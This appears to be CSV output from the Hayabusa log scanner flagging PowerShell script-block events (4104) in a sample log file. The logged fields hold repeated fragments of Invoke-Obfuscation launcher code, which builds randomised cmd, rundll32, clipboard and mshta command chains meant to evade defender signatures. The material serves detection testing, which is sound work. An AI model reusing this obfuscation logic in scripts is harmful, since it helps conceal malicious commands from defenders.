$SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. 
$InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. $InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. 
$PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. 
For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. 
$Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"t','*xec*t','*ecu*t','*cut*t','*cuti*t','*uti*t','E*ext','E*xt','E*Cont*','E*onte*','E*tex*','ExecutionContext')) + ').Value' # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariable # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $VariableName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$VariableName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random Invoke-Expression/IEX/$ExecutionContext syntax. $InvokeOptions = @() $InvokeOptions += (Get-Random -Input ('IEX','Invoke-Expression')) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $GetRandomVariableSyntax $InvokeOptions += (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $GetRandomVariableSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' # Select random option from above. 
$InvokeOption = Get-Random -Input $InvokeOptions # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $ExecContextVariable = ([Char[]]$ExecContextVariable.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $GetRandomVariableSyntax = ([Char[]]$GetRandomVariableSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Undo some escaping from beginning of function. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} If($PowerShellStdin.Contains(""^$Char"")) {$PowerShellStdin = $PowerShellStdin.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellStdin + ' '*(Get-Random -Minimum 0 -Maximum 3) $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + ' '*(Get-Random -Minimum 0 -Maximum 3)+ $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $SetSyntax2 + $Echo + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + '^|' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 10 { ############ ## CLIP++ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # Since we're embedding $PowerShellClip syntax one more process deep we need to double-escape & < > and | characters for cmd.exe. 
ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""^$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""^$Char"",""^^^$Char"") } } # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. 
For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PsCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 11 { ############## ## RUNDLL++ ## ############## # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. 
ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. 
$Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. 
If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. 
